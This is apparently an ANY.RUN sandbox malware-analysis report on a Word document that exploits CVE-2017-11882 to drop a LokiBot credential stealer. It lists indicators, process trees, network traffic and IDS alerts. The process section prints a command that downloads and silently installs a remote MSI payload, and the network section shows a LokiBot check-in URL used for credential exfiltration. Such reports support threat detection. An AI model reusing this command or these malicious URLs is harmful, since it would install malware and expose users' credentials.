analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://amazonvietnampharma.com.vn/l/css/css.doc

Full analysis: https://app.any.run/tasks/723e5b0e-e34b-4470-8e5f-0675e40ee7b8
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 19, 2019, 11:02:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
exe-to-msi
loader
trojan
lokibot
Indicators:
MD5:

B8656D933E1B2913E492318164EE9D0A

SHA1:

F4E39168525AD2A5EE29D033C7202D107BE1BCCE

SHA256:

546AC2B3A405535E57BDB08485A6AF39C23A3D8BB347489EBEABD3837E32E037

SSDEEP:

3:N1KfWt05Ld2qUBAdn:CECLd2Z8n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 4084)

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2036)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3440)

    • LOKIBOT was detected

      • MSI6890.tmp (PID: 2208)

    • Connects to CnC server

      • MSI6890.tmp (PID: 2208)

    • Detected artifacts of LokiBot

      • MSI6890.tmp (PID: 2208)

    • Actions looks like stealing of personal data

      • MSI6890.tmp (PID: 2208)

  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 2132)

    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 2132)

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 2132)

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 2132)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3440)

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 4084)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3440)
      • MSI6890.tmp (PID: 2208)

    • Loads DLL from Mozilla Firefox

      • MSI6890.tmp (PID: 2208)

    • Creates files in the user directory

      • MSI6890.tmp (PID: 2208)

  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3252)

    • Creates files in the user directory

      • iexplore.exe (PID: 3252)
      • WINWORD.EXE (PID: 2132)
      • iexplore.exe (PID: 2976)

    • Application launched itself

      • iexplore.exe (PID: 2976)
      • MSI6890.tmp (PID: 2532)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2132)
      • WINWORD.EXE (PID: 3512)

    • Changes internet zones settings

      • iexplore.exe (PID: 2976)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3252)

    • Application was crashed

      • EQNEDT32.EXE (PID: 4084)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3440)

    • Application was dropped or rewritten from another process

      • MSI6890.tmp (PID: 2532)
      • MSI6890.tmp (PID: 2208)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 3440)
      • MSI6890.tmp (PID: 2532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
11
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe winword.exe winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msi6890.tmp no specs #LOKIBOT msi6890.tmp

Process information

PID
CMD
Path
Indicators
Parent process
2976"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3252"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2976 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2132"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3512"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
4084"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2036cmd.exe & /C CD C: & msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3384msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3440C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2880"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2532"C:\Windows\Installer\MSI6890.tmp"C:\Windows\Installer\MSI6890.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
2 439
Read events
1 606
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
27
Text files
23
Unknown types
10

Dropped files

PID
Process
Filename
Type
2976iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
2976iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2132WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF67A.tmp.cvr
MD5:
SHA256:
2132WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{D45CD8E0-487F-49AD-919B-B471463A4D7D}
MD5:
SHA256:
2132WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{09C4CF92-4453-41CE-A84C-68E53000419E}
MD5:
SHA256:
2976iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF3632E242E0744420.TMP
MD5:
SHA256:
2976iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{DC78AB40-3435-11E9-AA93-5254004A04AF}.dat
MD5:
SHA256:
2132WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{99DE1860-0A84-44B9-8077-151F384D6125}.FSDbinary
MD5:42F8FFE95C487E74287F829117F7A2B8
SHA256:CB74EC02F919C7CC9CED4605E3B33F4C828AC559F2F5D72B95548738F4A848AD
2132WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:1B5B8C2F02A4E12221886CFC376CA532
SHA256:4F137B27F50BB73D9934E73D27AE491B3F9793AF5085C21C010D7FAE1551394C
2132WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:7B0C682160ACD6D079C56E0550AE08B1
SHA256:E344E57D5BE0001C3AAFFCCCC40F8B93FC9FB82D8B204A453B251F5737CA3E60
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
11
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2132
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
suspicious
2132
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
suspicious
2132
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
2132
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
3252
iexplore.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
2132
WINWORD.EXE
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
2132
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
2132
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
compressed
56.4 Kb
suspicious
2208
MSI6890.tmp
POST
185.159.153.76:80
http://irubix.ir/wp-includes/layout/fre.php
IR
malicious
3440
msiexec.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/baba.msi
VN
executable
656 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2132
WINWORD.EXE
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
3440
msiexec.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
2976
iexplore.exe
13.107.21.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3252
iexplore.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
2208
MSI6890.tmp
185.159.153.76:80
irubix.ir
Fanavari Serverpars Argham Gostar Company Ltd.
IR
malicious
976
svchost.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 13.107.21.200
  • 204.79.197.200
whitelisted
amazonvietnampharma.com.vn
  • 115.146.122.229
suspicious
irubix.ir
  • 185.159.153.76
malicious

Threats

PID
Process
Class
Message
3440
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3440
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3440
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
2208
MSI6890.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
2208
MSI6890.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
2208
MSI6890.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
2208
MSI6890.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
2208
MSI6890.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
2208
MSI6890.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
2208
MSI6890.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://amazonvietnampharma.com.vn/l/css/css.doc